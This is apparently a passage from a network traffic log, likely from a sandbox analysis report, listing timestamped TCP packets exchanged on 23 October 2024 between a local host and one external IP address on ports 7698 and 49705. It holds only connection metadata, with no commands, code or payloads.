Oct 23, 2024 17:25:36.872371912 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872383118 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872406006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872430086 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872823000 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872889042 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872946024 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872991085 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.873003960 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.873038054 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.873045921 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.873076916 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.946783066 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.946834087 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.946852922 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.946882963 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.946892023 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.946948051 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.946959019 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947002888 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.947033882 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947068930 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947072983 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.947107077 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947115898 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.947154045 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.947171926 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947211027 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.947216988 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.947252989 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.991744995 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.991792917 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.991805077 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.991842985 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.991883039 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.991925955 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.991938114 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.991965055 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.991997004 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.992140055 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.992165089 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.992177963 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.992180109 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.992202044 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.992216110 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.066553116 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066622972 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066636086 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066664934 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.066696882 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.066771030 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066788912 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066800117 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.066823006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.066838026 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.067085981 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.067096949 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.067137957 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111413956 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111454010 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111466885 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111538887 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111546993 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111561060 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111591101 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111609936 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111761093 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111772060 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111802101 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111819029 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111887932 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111937046 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.111962080 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.111974955 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.112010956 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.112041950 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.112077951 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186089039 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186131954 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186142921 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186213970 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186225891 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186239004 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186276913 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186310053 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186480045 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186527014 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186558962 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186569929 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186595917 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186618090 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186880112 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.186924934 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.186994076 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.187033892 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.230803967 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.230823994 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.230889082 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.230920076 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.230968952 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.230978012 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.230983019 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.230997086 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231014967 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.231025934 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.231045008 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.231662035 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231676102 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231688023 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231700897 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231714010 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.231719017 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.231731892 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.231774092 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.305670023 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.305717945 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.305731058 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.305775881 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.305783033 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.305794954 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.305839062 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.305979967 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.306029081 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.306034088 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.306049109 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.306071043 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.306087971 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.306113005 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.306154013 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.349658012 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.349780083 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.349945068 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.349982977 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350507021 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350549936 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350559950 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350562096 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350591898 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350608110 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350676060 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350687027 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350711107 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350733042 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350745916 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.350779057 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.350999117 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.351037025 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.351063967 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.351077080 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.351089001 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.351099968 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.351115942 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.351135015 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.351232052 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.351265907 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.425328970 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425344944 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425421000 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425424099 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.425434113 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425446987 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425463915 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.425491095 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.425674915 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425719976 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.425839901 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425852060 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.425892115 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470151901 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470235109 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470263958 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470277071 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470304012 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470324039 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470441103 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470491886 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470612049 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470623970 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470650911 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470663071 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470789909 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470851898 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.470977068 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.470988035 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471014023 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471025944 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471340895 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471353054 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471364975 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471385956 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471399069 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471415997 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471492052 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471537113 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.471837997 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.471884012 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.472012043 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.472048998 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.544857979 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.544891119 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.544903994 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.544915915 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.544931889 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.544976950 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.545368910 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.545382023 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.545392990 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.545419931 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.545430899 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.545453072 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.545492887 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.545496941 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.545521975 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.589428902 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589442015 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589474916 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589485884 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.589529991 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.589546919 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589560986 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589570999 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.589591980 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.589612007 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.590075016 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590101004 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590111971 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590125084 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.590138912 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.590409040 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590451002 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590451956 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.590462923 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.590496063 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.591125965 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.615984917 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.615998983 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.616157055 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.637939930 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.637960911 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.637976885 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.638011932 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.638039112 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.664433956 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664453030 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664459944 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664467096 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664530039 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664544106 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.664676905 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.708955050 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.708966970 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.708978891 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709033966 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709052086 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709065914 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709065914 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709094048 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709110022 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709393024 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709435940 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709548950 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709559917 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709599018 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709630013 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709641933 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.709687948 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.709944963 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.710016012 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.710036039 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.710048914 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.710061073 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.710078001 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.710130930 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.710130930 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.710130930 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.758383989 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.758407116 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.758419991 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.758627892 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.758627892 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.783819914 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.783864021 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.783879042 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.783967972 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.783981085 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.784034967 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.784038067 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.784038067 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.784071922 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.784071922 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.784296036 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.784342051 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.784486055 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.784528017 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.828511000 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828568935 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828613043 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828651905 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828691006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.828691006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.828691006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.828722000 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.828849077 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828860044 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.828901052 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829010010 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829030037 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829054117 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829075098 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829077959 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829129934 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829699993 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829714060 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829725981 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829739094 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829757929 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829783916 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829885960 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829930067 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.829930067 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.829977989 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.873687983 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.873703003 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.873936892 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:37.877897024 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:37.877927065 CEST	7698	49705	79.124.58.130	192.168.2.8
